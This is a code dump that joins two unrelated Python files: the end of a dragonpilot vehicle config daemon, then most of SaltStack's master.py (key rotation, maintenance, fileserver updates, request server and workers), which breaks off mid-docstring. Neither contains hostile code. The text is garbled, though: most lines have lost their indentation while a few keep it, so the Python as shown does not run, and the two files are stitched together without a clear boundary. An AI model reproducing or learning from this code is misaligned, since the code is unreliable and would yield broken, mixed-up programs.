  if 'param' in conf_type and 'struct' in conf_type:
    param_file = PARAM_PATH + conf['name']
    # only stat the param file if it exists; skip the update entirely when it
    # has not been touched since the last pass
    if os.path.isfile(param_file):
      access_time = os.path.getatime(param_file)
      if last_modified_confs.get(conf['name']) == access_time:
        return msg
update_this_conf = True
if not first_run:
update_once = conf.get('update_once')
if update_once is not None and update_once is True:
return msg
if update_this_conf:
update_this_conf = check_dependencies(msg, conf)
if update_this_conf:
msg = set_message(msg, conf)
  if access_time is not None:
    last_modified_confs[conf['name']] = access_time
return msg
def update_conf_all(confs, msg, first_run = False):
for conf in confs:
msg = update_conf(msg, conf, first_run)
return msg
def process_charging_ctrl(msg, last_charging_ctrl, battery_percent):
charging_ctrl = msg.dragonConf.dpChargingCtrl
if last_charging_ctrl != charging_ctrl:
HARDWARE.set_battery_charging(True)
if charging_ctrl:
if battery_percent >= msg.dragonConf.dpDischargingAt and HARDWARE.get_battery_charging():
HARDWARE.set_battery_charging(False)
elif battery_percent <= msg.dragonConf.dpChargingAt and not HARDWARE.get_battery_charging():
HARDWARE.set_battery_charging(True)
return charging_ctrl
def update_custom_logic(msg):
if msg.dragonConf.dpAtl:
msg.dragonConf.dpAllowGas = True
msg.dragonConf.dpGearCheck = False
if not msg.dragonConf.dpAtlOpLong:
# msg.dragonConf.dpFollowingProfileCtrl = False
msg.dragonConf.dpAccelProfileCtrl = False
if msg.dragonConf.dpLcMinMph > msg.dragonConf.dpLcAutoMinMph:
put_nonblocking('dp_lc_auto_min_mph', str(msg.dragonConf.dpLcMinMph))
msg.dragonConf.dpLcAutoMinMph = msg.dragonConf.dpLcMinMph
# if msg.dragonConf.dpSrCustom <= 4.99 and msg.dragonConf.dpSrStock > 0:
# put_nonblocking('dp_sr_custom', str(msg.dragonConf.dpSrStock))
# msg.dragonConf.dpSrCustom = msg.dragonConf.dpSrStock
# if msg.dragonConf.dpAppWaze or msg.dragonConf.dpAppHr:
# msg.dragonConf.dpDrivingUi = False
# if not msg.dragonConf.dpDriverMonitor:
# msg.dragonConf.dpUiFace = False
return msg
def update_ip(msg):
  s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except:
IP = 'N/A'
finally:
s.close()
setattr(msg.dragonConf, get_struct_name('dp_ip_addr'), IP)
return msg
def set_message(msg, conf):
val = params.get(conf['name'], encoding='utf8')
if val is not None:
val = val.rstrip('\x00')
else:
val = conf.get('default')
params.put(conf['name'], str(val))
struct_val = to_struct_val(conf['name'], val)
orig_val = struct_val
if struct_val is not None:
if conf.get('min') is not None:
struct_val = max(struct_val, conf.get('min'))
if conf.get('max') is not None:
struct_val = min(struct_val, conf.get('max'))
if orig_val != struct_val:
params.put(conf['name'], str(struct_val))
setattr(msg.dragonConf, get_struct_name(conf['name']), struct_val)
return msg
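# Worked example of the clamp-and-write-back behaviour in set_message above
# (hypothetical conf entry and stored value): with
# conf = {'name': 'dp_camera_offset', 'min': -20, 'max': 20} and a stored
# value of "35", struct_val is clamped to 20 and "20" is written back to the
# param store, keeping disk and the broadcast message in sync.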
def check_dependencies(msg, conf):
passed = True
# if has dependency and the depend param val is not in depend_vals, we dont update that conf val
# this should reduce chance of reading unnecessary params
dependencies = conf.get('depends')
if dependencies is not None:
for dependency in dependencies:
if getattr(msg.dragonConf, get_struct_name(dependency['name'])) not in dependency['vals']:
passed = False
break
return passed
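# A hypothetical conf entry illustrating the 'depends' contract checked in
# check_dependencies above: the conf is only pushed when every named
# dependency's current struct value is one of the allowed vals.
#
# conf = {
#   'name': 'dp_example_ctrl',
#   'conf_type': ['param', 'struct'],
#   'depends': [{'name': 'dp_example_master_switch', 'vals': [True]}],
# }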
def main():
confd_thread()
if __name__ == "__main__":
main()
|
master.py
|
# -*- coding: utf-8 -*-
'''
This module contains all of the routines needed to set up a master server, this
involves preparing the three listeners and the workers needed by the master.
'''
# Import python libs
from __future__ import absolute_import, with_statement, print_function, unicode_literals
import copy
import ctypes
import functools
import os
import re
import sys
import time
import signal
import stat
import logging
import collections
import multiprocessing
import threading
import salt.serializers.msgpack
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
# pylint: enable=import-error,no-name-in-module,redefined-builtin
import tornado.gen # pylint: disable=F0401
# Import salt libs
import salt.crypt
import salt.client
import salt.client.ssh.client
import salt.exceptions
import salt.payload
import salt.pillar
import salt.state
import salt.runner
import salt.auth
import salt.wheel
import salt.minion
import salt.key
import salt.acl
import salt.engines
import salt.loader
import salt.daemons.masterapi
import salt.defaults.exitcodes
import salt.transport.server
import salt.log.setup
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.crypt
import salt.utils.event
import salt.utils.files
import salt.utils.gitfs
import salt.utils.gzip_util
import salt.utils.jid
import salt.utils.job
import salt.utils.master
import salt.utils.minions
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.stringutils
import salt.utils.user
import salt.utils.verify
import salt.utils.zeromq
from salt.config import DEFAULT_INTERVAL
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.transport import iter_transport_opts
from salt.utils.debug import (
enable_sigusr1_handler, enable_sigusr2_handler, inspect_stack
)
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
try:
import resource
HAS_RESOURCE = True
except ImportError:
# resource is not available on windows
HAS_RESOURCE = False
# Import halite libs
try:
import halite # pylint: disable=import-error
HAS_HALITE = True
except ImportError:
HAS_HALITE = False
from tornado.stack_context import StackContext
from salt.utils.ctx import RequestContext
log = logging.getLogger(__name__)
class SMaster(object):
'''
Create a simple salt-master, this will generate the top-level master
'''
secrets = {} # mapping of key -> {'secret': multiprocessing type, 'reload': FUNCTION}
def __init__(self, opts):
'''
Create a salt master server instance
:param dict opts: The salt options dictionary
'''
self.opts = opts
self.master_key = salt.crypt.MasterKeys(self.opts)
self.key = self.__prep_key()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self.opts = state['opts']
self.master_key = state['master_key']
self.key = state['key']
SMaster.secrets = state['secrets']
def __getstate__(self):
return {'opts': self.opts,
'master_key': self.master_key,
'key': self.key,
'secrets': SMaster.secrets}
def __prep_key(self):
'''
A key needs to be placed in the filesystem with permissions 0400 so
clients are required to run as root.
'''
return salt.daemons.masterapi.access_keys(self.opts)
class Maintenance(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
A generalized maintenance process which performs maintenance routines.
'''
def __init__(self, opts, **kwargs):
'''
Create a maintenance instance
:param dict opts: The salt options
'''
super(Maintenance, self).__init__(**kwargs)
self.opts = opts
# How often do we perform the maintenance tasks
self.loop_interval = int(self.opts['loop_interval'])
# Track key rotation intervals
self.rotate = int(time.time())
# A serializer for general maint operations
self.serial = salt.payload.Serial(self.opts)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _post_fork_init(self):
'''
Some things need to be init'd after the fork has completed
The easiest example is that one of these module types creates a thread
in the parent process, then once the fork happens you'll start getting
errors like "WARNING: Mixing fork() and threads detected; memory leaked."
'''
# Load Runners
ropts = dict(self.opts)
ropts['quiet'] = True
runner_client = salt.runner.RunnerClient(ropts)
# Load Returners
self.returners = salt.loader.returners(self.opts, {})
# Init Scheduler
self.schedule = salt.utils.schedule.Schedule(self.opts,
runner_client.functions_dict(),
returners=self.returners)
self.ckminions = salt.utils.minions.CkMinions(self.opts)
# Make Event bus for firing
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
# Init any values needed by the git ext pillar
self.git_pillar = salt.daemons.masterapi.init_git_pillar(self.opts)
self.presence_events = False
if self.opts.get('presence_events', False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != 'tcp':
tcp_only = False
if not tcp_only:
# For a TCP only transport, the presence events will be
# handled in the transport code.
self.presence_events = True
def run(self):
'''
This is the general passive maintenance process controller for the Salt
master.
This is where any data that needs to be cleanly maintained from the
master is maintained.
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
# init things that need to be done after the process is forked
self._post_fork_init()
# Make Start Times
last = int(time.time())
old_present = set()
while True:
now = int(time.time())
if (now - last) >= self.loop_interval:
salt.daemons.masterapi.clean_old_jobs(self.opts)
salt.daemons.masterapi.clean_expired_tokens(self.opts)
salt.daemons.masterapi.clean_pub_auth(self.opts)
self.handle_git_pillar()
self.handle_schedule()
self.handle_key_cache()
self.handle_presence(old_present)
self.handle_key_rotate(now)
salt.utils.verify.check_max_open_files(self.opts)
last = now
time.sleep(self.loop_interval)
def handle_key_cache(self):
'''
Evaluate accepted keys and create a msgpack file
which contains a list
'''
if self.opts['key_cache'] == 'sched':
keys = []
#TODO DRY from CKMinions
if self.opts['transport'] in ('zeromq', 'tcp'):
acc = 'minions'
else:
acc = 'accepted'
for fn_ in os.listdir(os.path.join(self.opts['pki_dir'], acc)):
if not fn_.startswith('.') and os.path.isfile(os.path.join(self.opts['pki_dir'], acc, fn_)):
keys.append(fn_)
log.debug('Writing master key cache')
# Write a temporary file securely
with salt.utils.atomicfile.atomic_open(os.path.join(self.opts['pki_dir'], acc, '.key_cache')) as cache_file:
self.serial.dump(keys, cache_file)
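    # Reading the cache back is the mirror operation; a minimal sketch,
    # assuming the zeromq/tcp transport ('minions' dir) and the same
    # serializer and path conventions as handle_key_cache (not part of the
    # original class):
    #
    # def read_key_cache(opts, serial):
    #     cache_path = os.path.join(opts['pki_dir'], 'minions', '.key_cache')
    #     with salt.utils.files.fopen(cache_path, 'rb') as fp_:
    #         return serial.load(fp_)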
def handle_key_rotate(self, now):
'''
        Rotate the AES key
'''
to_rotate = False
dfn = os.path.join(self.opts['cachedir'], '.dfn')
try:
stats = os.stat(dfn)
# Basic Windows permissions don't distinguish between
# user/group/all. Check for read-only state instead.
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
to_rotate = True
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
elif stats.st_mode == 0o100400:
to_rotate = True
else:
log.error('Found dropfile with incorrect permissions, ignoring...')
os.remove(dfn)
except os.error:
pass
if self.opts.get('publish_session'):
if now - self.rotate >= self.opts['publish_session']:
to_rotate = True
if to_rotate:
log.info('Rotating master AES key')
for secret_key, secret_map in six.iteritems(SMaster.secrets):
# should be unnecessary-- since no one else should be modifying
with secret_map['secret'].get_lock():
secret_map['secret'].value = salt.utils.stringutils.to_bytes(secret_map['reload']())
self.event.fire_event({'rotate_{0}_key'.format(secret_key): True}, tag='key')
self.rotate = now
if self.opts.get('ping_on_rotate'):
# Ping all minions to get them to pick up the new key
log.debug('Pinging all connected minions '
'due to key rotation')
salt.utils.master.ping_all_connected_minions(self.opts)
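    # For reference: the ".dfn" dropfile checked above is an out-of-band way
    # to request a rotation. A file created with mode 0400 under cachedir
    # trips the st_mode == 0o100400 branch on the next loop pass; a dropfile
    # with any other permissions is treated as suspicious and removed.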
def handle_git_pillar(self):
'''
Update git pillar
'''
try:
for pillar in self.git_pillar:
pillar.fetch_remotes()
except Exception as exc:
log.error('Exception caught while updating git_pillar',
exc_info=True)
def handle_schedule(self):
'''
Evaluate the scheduler
'''
try:
self.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if self.schedule.loop_interval < self.loop_interval:
self.loop_interval = self.schedule.loop_interval
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
def handle_presence(self, old_present):
'''
Fire presence events if enabled
'''
if self.presence_events:
present = self.ckminions.connected_ids()
new = present.difference(old_present)
lost = old_present.difference(present)
if new or lost:
# Fire new minions present event
data = {'new': list(new),
'lost': list(lost)}
self.event.fire_event(data, tagify('change', 'presence'))
data = {'present': list(present)}
# On the first run it may need more time for the EventPublisher
# to come up and be ready. Set the timeout to account for this.
self.event.fire_event(data, tagify('present', 'presence'), timeout=3)
old_present.clear()
old_present.update(present)
class FileserverUpdate(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
A process from which to update any dynamic fileserver backends
'''
def __init__(self, opts, **kwargs):
super(FileserverUpdate, self).__init__(**kwargs)
self.opts = opts
self.update_threads = {}
# Avoid circular import
import salt.fileserver
self.fileserver = salt.fileserver.Fileserver(self.opts)
self.fill_buckets()
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
log_queue=state['log_queue'],
)
def __getstate__(self):
return {'opts': self.opts,
'log_queue': self.log_queue,
}
def fill_buckets(self):
'''
Get the configured backends and the intervals for any backend which
supports them, and set up the update "buckets". There will be one
bucket for each thing being updated at a given interval.
'''
update_intervals = self.fileserver.update_intervals()
self.buckets = {}
for backend in self.fileserver.backends():
fstr = '{0}.update'.format(backend)
try:
update_func = self.fileserver.servers[fstr]
except KeyError:
log.debug(
                    'No update function for the %s fileserver backend',
backend
)
continue
if backend in update_intervals:
# Variable intervals are supported for this backend
for id_, interval in six.iteritems(update_intervals[backend]):
if not interval:
# Don't allow an interval of 0
interval = DEFAULT_INTERVAL
log.debug(
'An update_interval of 0 is not supported, '
'falling back to %s', interval
)
i_ptr = self.buckets.setdefault(interval, OrderedDict())
# Backend doesn't technically need to be present in the
# key, all we *really* need is the function reference, but
# having it there makes it easier to provide meaningful
# debug logging in the update threads.
i_ptr.setdefault((backend, update_func), []).append(id_)
else:
# Variable intervals are not supported for this backend, so
# fall back to the global interval for that fileserver. Since
# this backend doesn't support variable updates, we have
# nothing to pass to the backend's update func, so we'll just
# set the value to None.
try:
interval_key = '{0}_update_interval'.format(backend)
interval = self.opts[interval_key]
except KeyError:
interval = DEFAULT_INTERVAL
log.warning(
'%s key missing from configuration. Falling back to '
'default interval of %d seconds',
interval_key, interval
)
self.buckets.setdefault(
interval, OrderedDict())[(backend, update_func)] = None
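    # For illustration, the resulting self.buckets maps interval -> ordered
    # work items; with a gitfs backend updating two remotes every 60 seconds
    # and a roots backend on the global default interval it might look like
    # (hypothetical values):
    #
    # {
    #     60: OrderedDict({('gitfs', <update func>): ['remote1', 'remote2']}),
    #     DEFAULT_INTERVAL: OrderedDict({('roots', <update func>): None}),
    # }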
def update_fileserver(self, interval, backends):
'''
Threading target which handles all updates for a given wait interval
'''
def _do_update():
log.debug(
'Performing fileserver updates for items with an update '
'interval of %d', interval
)
for backend, update_args in six.iteritems(backends):
backend_name, update_func = backend
try:
if update_args:
log.debug(
'Updating %s fileserver cache for the following '
'targets: %s', backend_name, update_args
)
args = (update_args,)
else:
log.debug('Updating %s fileserver cache', backend_name)
args = ()
update_func(*args)
except Exception as exc:
log.exception(
'Uncaught exception while updating %s fileserver '
'cache', backend_name
)
log.debug(
'Completed fileserver updates for items with an update '
'interval of %d, waiting %d seconds', interval, interval
)
condition = threading.Condition()
_do_update()
while True:
with condition:
condition.wait(interval)
_do_update()
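    # Design note on the loop above: threading.Condition().wait(interval) is
    # used purely as an interruptible sleep; nothing ever notifies the
    # condition, so each pass simply times out after `interval` seconds and
    # runs _do_update() again.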
def run(self):
'''
Start the update threads
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
# Clean out the fileserver backend cache
salt.daemons.masterapi.clean_fsbackend(self.opts)
for interval in self.buckets:
self.update_threads[interval] = threading.Thread(
target=self.update_fileserver,
args=(interval, self.buckets[interval]),
)
self.update_threads[interval].start()
# Keep the process alive
while True:
time.sleep(60)
class Master(SMaster):
'''
The salt master server
'''
def __init__(self, opts):
'''
Create a salt master server instance
        :param dict opts: The salt options dictionary
'''
if zmq and ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
SMaster.__init__(self, opts)
def __set_max_open_files(self):
if not HAS_RESOURCE:
return
# Let's check to see how our max open files(ulimit -n) setting is
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
if mof_h == resource.RLIM_INFINITY:
            # Unclear what to do with infinity... macOS reports RLIM_INFINITY
            # as the hard limit, but raising to anything above the soft limit
            # fails...
mof_h = mof_s
log.info(
'Current values for max open files soft/hard setting: %s/%s',
mof_s, mof_h
)
# Let's grab, from the configuration file, the value to raise max open
# files to
mof_c = self.opts['max_open_files']
if mof_c > mof_h:
# The configured value is higher than what's allowed
log.info(
'The value for the \'max_open_files\' setting, %s, is higher '
'than the highest value the user running salt is allowed to '
'set (%s). Defaulting to %s.', mof_c, mof_h, mof_h
)
mof_c = mof_h
if mof_s < mof_c:
# There's room to raise the value. Raise it!
log.info('Raising max open files value to %s', mof_c)
resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
try:
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.info(
'New values for max open files soft/hard values: %s/%s',
mof_s, mof_h
)
except ValueError:
# https://github.com/saltstack/salt/issues/1991#issuecomment-13025595
# A user under macOS reported that our 100000 default value is
# still too high.
log.critical(
'Failed to raise max open files setting to %s. If this '
'value is too low, the salt-master will most likely fail '
'to run properly.', mof_c
)
def _pre_flight(self):
'''
Run pre flight checks. If anything in this method fails then the master
should not start up.
'''
errors = []
critical_errors = []
try:
os.chdir('/')
except OSError as err:
errors.append(
'Cannot change to root directory ({0})'.format(err)
)
if self.opts.get('fileserver_verify_config', True):
# Avoid circular import
import salt.fileserver
fileserver = salt.fileserver.Fileserver(self.opts)
if not fileserver.servers:
errors.append(
'Failed to load fileserver backends, the configured backends '
'are: {0}'.format(', '.join(self.opts['fileserver_backend']))
)
else:
# Run init() for all backends which support the function, to
# double-check configuration
try:
fileserver.init()
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append('{0}'.format(exc))
if not self.opts['fileserver_backend']:
errors.append('No fileserver backends are configured')
# Check to see if we need to create a pillar cache dir
if self.opts['pillar_cache'] and not os.path.isdir(os.path.join(self.opts['cachedir'], 'pillar_cache')):
try:
with salt.utils.files.set_umask(0o077):
os.mkdir(os.path.join(self.opts['cachedir'], 'pillar_cache'))
except OSError:
pass
if self.opts.get('git_pillar_verify_config', True):
try:
git_pillars = [
x for x in self.opts.get('ext_pillar', [])
if 'git' in x
and not isinstance(x['git'], six.string_types)
]
except TypeError:
git_pillars = []
critical_errors.append(
'Invalid ext_pillar configuration. It is likely that the '
'external pillar type was not specified for one or more '
'external pillars.'
)
if git_pillars:
try:
new_opts = copy.deepcopy(self.opts)
import salt.pillar.git_pillar
for repo in git_pillars:
new_opts['ext_pillar'] = [repo]
try:
git_pillar = salt.utils.gitfs.GitPillar(
new_opts,
repo['git'],
per_remote_overrides=salt.pillar.git_pillar.PER_REMOTE_OVERRIDES,
per_remote_only=salt.pillar.git_pillar.PER_REMOTE_ONLY,
global_only=salt.pillar.git_pillar.GLOBAL_ONLY)
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append(exc.strerror)
finally:
del new_opts
if errors or critical_errors:
for error in errors:
log.error(error)
for error in critical_errors:
log.critical(error)
log.critical('Master failed pre flight checks, exiting\n')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
def start(self):
'''
Turn on the master server components
'''
self._pre_flight()
log.info('salt-master is starting as user \'%s\'', salt.utils.user.get_user())
enable_sigusr1_handler()
enable_sigusr2_handler()
self.__set_max_open_files()
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
# Setup the secrets here because the PubServerChannel may need
# them as well.
SMaster.secrets['aes'] = {
'secret': multiprocessing.Array(
ctypes.c_char,
salt.utils.stringutils.to_bytes(
salt.crypt.Crypticle.generate_key_string()
)
),
'reload': salt.crypt.Crypticle.generate_key_string
}
log.info('Creating master process manager')
# Since there are children having their own ProcessManager we should wait for kill more time.
self.process_manager = salt.utils.process.ProcessManager(wait_for_kill=5)
pub_channels = []
log.info('Creating master publisher process')
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.pre_fork(self.process_manager)
pub_channels.append(chan)
log.info('Creating master event publisher process')
self.process_manager.add_process(salt.utils.event.EventPublisher, args=(self.opts,))
if self.opts.get('reactor'):
if isinstance(self.opts['engines'], list):
rine = False
for item in self.opts['engines']:
if 'reactor' in item:
rine = True
break
if not rine:
self.opts['engines'].append({'reactor': {}})
else:
if 'reactor' not in self.opts['engines']:
log.info('Enabling the reactor engine')
self.opts['engines']['reactor'] = {}
salt.engines.start_engines(self.opts, self.process_manager)
# must be after channels
log.info('Creating master maintenance process')
self.process_manager.add_process(Maintenance, args=(self.opts,))
if self.opts.get('event_return'):
log.info('Creating master event return process')
self.process_manager.add_process(salt.utils.event.EventReturn, args=(self.opts,))
ext_procs = self.opts.get('ext_processes', [])
for proc in ext_procs:
log.info('Creating ext_processes process: %s', proc)
try:
mod = '.'.join(proc.split('.')[:-1])
cls = proc.split('.')[-1]
_tmp = __import__(mod, globals(), locals(), [cls], -1)
cls = _tmp.__getattribute__(cls)
self.process_manager.add_process(cls, args=(self.opts,))
except Exception:
log.error('Error creating ext_processes process: %s', proc)
if HAS_HALITE and 'halite' in self.opts:
log.info('Creating master halite process')
self.process_manager.add_process(Halite, args=(self.opts['halite'],))
# TODO: remove, or at least push into the transport stuff (pre-fork probably makes sense there)
if self.opts['con_cache']:
log.info('Creating master concache process')
self.process_manager.add_process(salt.utils.master.ConnectedCache, args=(self.opts,))
# workaround for issue #16315, race condition
log.debug('Sleeping for two seconds to let concache rest')
time.sleep(2)
log.info('Creating master request server process')
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = salt.log.setup.get_multiprocessing_logging_queue()
kwargs['log_queue_level'] = salt.log.setup.get_multiprocessing_logging_level()
kwargs['secrets'] = SMaster.secrets
self.process_manager.add_process(
ReqServer,
args=(self.opts, self.key, self.master_key),
kwargs=kwargs,
name='ReqServer')
self.process_manager.add_process(
FileserverUpdate,
args=(self.opts,))
# Fire up SSDP discovery publisher
if self.opts['discovery']:
if salt.utils.ssdp.SSDPDiscoveryServer.is_available():
self.process_manager.add_process(salt.utils.ssdp.SSDPDiscoveryServer(
port=self.opts['discovery']['port'],
listen_ip=self.opts['interface'],
answer={'mapping': self.opts['discovery'].get('mapping', {})}).run)
else:
log.error('Unable to load SSDP: asynchronous IO is not available.')
if sys.version_info.major == 2:
log.error('You are using Python 2, please install "trollius" module to enable SSDP discovery.')
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
self.process_manager.run()
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
class Halite(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
Manage the Halite server
'''
def __init__(self, hopts, **kwargs):
'''
Create a halite instance
:param dict hopts: The halite options
'''
super(Halite, self).__init__(**kwargs)
self.hopts = hopts
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['hopts'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'hopts': self.hopts,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def run(self):
'''
Fire up halite!
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
halite.start(self.hopts)
class ReqServer(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
Starts up the master request server, minions send results to this
interface.
'''
def __init__(self, opts, key, mkey, secrets=None, **kwargs):
'''
Create a request server
:param dict opts: The salt options dictionary
        :param dict key: The user starting the server and the AES key
        :param dict mkey: The user starting the server and the RSA key
:rtype: ReqServer
:returns: Request server
'''
super(ReqServer, self).__init__(**kwargs)
self.opts = opts
self.master_key = mkey
# Prepare the AES key
self.key = key
self.secrets = secrets
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
state['key'],
state['mkey'],
secrets=state['secrets'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'key': self.key,
'mkey': self.master_key,
'secrets': self.secrets,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self.destroy(signum)
super(ReqServer, self)._handle_signals(signum, sigframe)
def __bind(self):
'''
Binds the reply server
'''
if self.log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
if self.log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(self.log_queue_level)
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
if self.secrets is not None:
SMaster.secrets = self.secrets
dfn = os.path.join(self.opts['cachedir'], '.dfn')
if os.path.isfile(dfn):
try:
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
os.remove(dfn)
except os.error:
pass
        # Wait for kill should be less than the parent's ProcessManager.
self.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager',
wait_for_kill=1)
req_channels = []
tcp_only = True
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.ReqServerChannel.factory(opts)
chan.pre_fork(self.process_manager)
req_channels.append(chan)
if transport != 'tcp':
tcp_only = False
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = self.log_queue
kwargs['log_queue_level'] = self.log_queue_level
# Use one worker thread if only the TCP transport is set up on
# Windows and we are using Python 2. There is load balancer
# support on Windows for the TCP transport when using Python 3.
if tcp_only and six.PY2 and int(self.opts['worker_threads']) != 1:
log.warning('TCP transport supports only 1 worker on Windows '
'when using Python 2.')
self.opts['worker_threads'] = 1
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
for ind in range(int(self.opts['worker_threads'])):
name = 'MWorker-{0}'.format(ind)
self.process_manager.add_process(MWorker,
args=(self.opts,
self.master_key,
self.key,
req_channels,
name),
kwargs=kwargs,
name=name)
self.process_manager.run()
def run(self):
'''
Start up the ReqServer
'''
self.__bind()
def destroy(self, signum=signal.SIGTERM):
if hasattr(self, 'process_manager'):
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
self.process_manager.kill_children()
def __del__(self):
self.destroy()
class MWorker(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
The worker multiprocess instance to manage the backend operations for the
salt master.
'''
def __init__(self,
opts,
mkey,
key,
req_channels,
name,
**kwargs):
'''
Create a salt master worker process
:param dict opts: The salt options
:param dict mkey: The user running the salt master and the AES key
:param dict key: The user running the salt master and the RSA key
:rtype: MWorker
:return: Master worker
'''
kwargs['name'] = name
self.name = name
super(MWorker, self).__init__(**kwargs)
self.opts = opts
self.req_channels = req_channels
self.mkey = mkey
self.key = key
self.k_mtime = 0
self.stats = collections.defaultdict(lambda: {'mean': 0, 'latency': 0, 'runs': 0})
self.stat_clock = time.time()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self._is_child = True
super(MWorker, self).__init__(
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
self.opts = state['opts']
self.req_channels = state['req_channels']
self.mkey = state['mkey']
self.key = state['key']
self.k_mtime = state['k_mtime']
SMaster.secrets = state['secrets']
def __getstate__(self):
return {
'opts': self.opts,
'req_channels': self.req_channels,
'mkey': self.mkey,
'key': self.key,
'k_mtime': self.k_mtime,
'secrets': SMaster.secrets,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _handle_signals(self, signum, sigframe):
for channel in getattr(self, 'req_channels', ()):
channel.close()
super(MWorker, self)._handle_signals(signum, sigframe)
def __bind(self):
'''
Bind to the local port
'''
# using ZMQIOLoop since we *might* need zmq in there
install_zmq()
self.io_loop = ZMQDefaultLoop()
self.io_loop.make_current()
for req_channel in self.req_channels:
req_channel.post_fork(self._handle_payload, io_loop=self.io_loop) # TODO: cleaner? Maybe lazily?
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
# Tornado knows what to do
pass
@tornado.gen.coroutine
def _handle_payload(self, payload):
'''
The _handle_payload method is the key method used to figure out what
needs to be done with communication to the server
Example cleartext payload generated for 'salt myminion test.ping':
{'enc': 'clear',
'load': {'arg': [],
